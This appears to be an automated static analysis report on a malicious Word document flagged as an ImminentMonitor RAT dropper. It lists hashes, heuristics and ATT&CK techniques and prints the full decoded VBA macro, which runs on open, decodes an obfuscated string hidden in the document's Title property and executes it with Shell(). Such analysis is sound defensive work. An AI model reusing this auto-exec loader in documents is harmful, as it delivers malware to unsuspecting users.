Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d9f3fe32e05d7183…

MALICIOUS

Office (OLE)

40.5 KB Created: 2018-02-02 10:00:00 Authoring application: Microsoft Office Word First seen: 2018-08-05
MD5: 7330d974021d2053418ec67e373cb401 SHA-1: 3d0b7ef9e8f367ef241e415b88c4720e01a993aa SHA-256: d9f3fe32e05d7183136f3885758078250862978367361639200cff4b8f2b7415
230 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample contains a VBA macro that is triggered by the Document_Open event. This macro decodes a string and uses the Shell() function to execute it, likely downloading and running a second-stage payload. The ClamAV detection name 'Doc.Dropper.ImminentMonitorRAT-10018167-0' further supports its nature as a dropper.

Heuristics 8

  • ClamAV: Doc.Dropper.ImminentMonitorRAT-10018167-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.ImminentMonitorRAT-10018167-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
            ltrbknyfz = StrConv(karsri, vbUnicode)
            Shell (Replace(Replace(Split(ltrbknyfz, Chr(124))(1), Split(ltrbknyfz, Chr(124))(0), Chr(46)), "FP" + "ATH", ActiveDocument.path & Application.PathSeparator & ActiveDocument.Name)), 0
    End Sub
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
    Private Sub Document_Open()
            efsv = ThisDocument.BuiltInDocumentProperties("Tit" + "le")
  • NOP-equivalent sled detected medium SC_NOP_EQUIV_SLED
    Long run of 0x61 bytes
    Disassembly
    Attempted x86 opcode disassembly
    00004708  61                popal
    00004709  61                popal
    0000470A  61                popal
    0000470B  61                popal
    0000470C  61                popal
    0000470D  61                popal
    0000470E  61                popal
    0000470F  61                popal
    00004710  61                popal
    00004711  61                popal
    00004712  61                popal
    00004713  61                popal
    00004714  61                popal
    00004715  61                popal
    00004716  61                popal
    00004717  61                popal
    00004718  61                popal
    00004719  61                popal
    0000471A  61                popal
    0000471B  61                popal
    0000471C  61                popal
    0000471D  61                popal
    0000471E  61                popal
    0000471F  61                popal
    00004720  61                popal
    00004721  61                popal
    00004722  61                popal
    00004723  61                popal
    00004724  61                popal
    00004725  61                popal
    00004726  61                popal
    00004727  61                popal
    00004728  61                popal
    00004729  61                popal
    0000472A  61                popal
    0000472B  61                popal
    0000472C  61                popal
    0000472D  61                popal
    0000472E  61                popal
    0000472F  61                popal
    00004730  61                popal
    00004731  61                popal
    00004732  61                popal
    00004733  61                popal
    00004734  61                popal
    00004735  61                popal
    00004736  61                popal
    00004737  61                popal
    00004738  61                popal
    00004739  61                popal
    0000473A  61                popal
    0000473B  61                popal
    0000473C  61                popal
    0000473D  61                popal
    0000473E  61                popal
    0000473F  61                popal
    00004740  61                popal
    00004741  61                popal
    00004742  61                popal
    00004743  61                popal
    00004744  61                popal
    00004745  61                popal
    00004746  61                popal
    00004747  61                popal
    00004748  61                popal
    00004749  61                popal
    0000474A  61                popal
    0000474B  61                popal
    0000474C  61                popal
    0000474D  61                popal
    0000474E  61                popal
    0000474F  61                popal
    00004750  61                popal
    00004751  61                popal
    00004752  61                popal
    00004753  61                popal
    00004754  61                popal
    00004755  61                popal
    00004756  61                popal
    00004757  61                popal
    00004758  61                popal
    00004759  61                popal
    0000475A  61                popal
    0000475B  61                popal
    0000475C  61                popal
    0000475D  61                popal
    0000475E  61                popal
    0000475F  61                popal
    00004760  61                popal
    00004761  61                popal
    00004762  61                popal
    00004763  61                popal
    00004764  61                popal
    00004765  61                popal
    00004766  61                popal
    00004767  61                popal
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2733 bytes
SHA-256: e4fab99b1e601be23aea38196e337d6138c32ba2df684e6edf3c1bb9c08b521c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
        efsv = ThisDocument.BuiltInDocumentProperties("Tit" + "le")
        Dim ltrbknyfz As String
        Dim shmoo As String
        shmoo = StrReverse(efsv)
        Dim karsri() As Byte
        karsri = StrConv(shmoo, vbFromUnicode)
        Dim tdqdokgvtdus As Long
        For tdqdokgvtdus = 0 To UBound(karsri)
                karsri(tdqdokgvtdus) = karsri(tdqdokgvtdus) - 9 + 2
        Next tdqdokgvtdus
        ltrbknyfz = StrConv(karsri, vbUnicode)
        Shell (Replace(Replace(Split(ltrbknyfz, Chr(124))(1), Split(ltrbknyfz, Chr(124))(0), Chr(46)), "FP" + "ATH", ActiveDocument.path & Application.PathSeparator & ActiveDocument.Name)), 0
End Sub

' Processing file: /tmp/qstore_whyi1s96
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 4190 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Open())
' Line #1:
' 	LitStr 0x0003 "Tit"
' 	LitStr 0x0002 "le"
' 	Add 
' 	Ld ThisDocument 
' 	ArgsMemLd BuiltInDocumentProperties 0x0001 
' 	St hlitb 
' Line #2:
' 	Dim 
' 	VarDefn efsv (As String)
' Line #3:
' 	Dim 
' 	VarDefn ltrbknyfz (As String)
' Line #4:
' 	Ld hlitb 
' 	ArgsLd StrReverse 0x0001 
' 	St ltrbknyfz 
' Line #5:
' 	Dim 
' 	VarDefn shmoo (As Byte)
' Line #6:
' 	Ld ltrbknyfz 
' 	Ld vbFromUnicode 
' 	ArgsLd StrConv 0x0002 
' 	St shmoo 
' Line #7:
' 	Dim 
' 	VarDefn karsri (As Long)
' Line #8:
' 	StartForVariable 
' 	Ld karsri 
' 	EndForVariable 
' 	LitDI2 0x0000 
' 	Ld shmoo 
' 	FnUBound 0x0000 
' 	For 
' Line #9:
' 	Ld karsri 
' 	ArgsLd shmoo 0x0001 
' 	LitDI2 0x0009 
' 	Sub 
' 	LitDI2 0x0002 
' 	Add 
' 	Ld karsri 
' 	ArgsSt shmoo 0x0001 
' Line #10:
' 	StartForVariable 
' 	Ld karsri 
' 	EndForVariable 
' 	NextVar 
' Line #11:
' 	Ld shmoo 
' 	Ld vbUnicode 
' 	ArgsLd StrConv 0x0002 
' 	St efsv 
' Line #12:
' 	LitDI2 0x0001 
' 	Ld efsv 
' 	LitDI2 0x007C 
' 	ArgsLd Chr 0x0001 
' 	ArgsLd Split 0x0002 
' 	IndexLd 0x0001 
' 	LitDI2 0x0000 
' 	Ld efsv 
' 	LitDI2 0x007C 
' 	ArgsLd Chr 0x0001 
' 	ArgsLd Split 0x0002 
' 	IndexLd 0x0001 
' 	LitDI2 0x002E 
' 	ArgsLd Chr 0x0001 
' 	ArgsLd Replace 0x0003 
' 	LitStr 0x0002 "FP"
' 	LitStr 0x0003 "ATH"
' 	Add 
' 	Ld ActiveDocument 
' 	MemLd path 
' 	Ld Application 
' 	MemLd PathSeparator 
' 	Concat 
' 	Ld ActiveDocument 
' 	MemLd Name 
' 	Concat 
' 	ArgsLd Replace 0x0003 
' 	Paren 
' 	LitDI2 0x0000 
' 	ArgsCall Shell 0x0002 
' Line #13:
' 	EndSub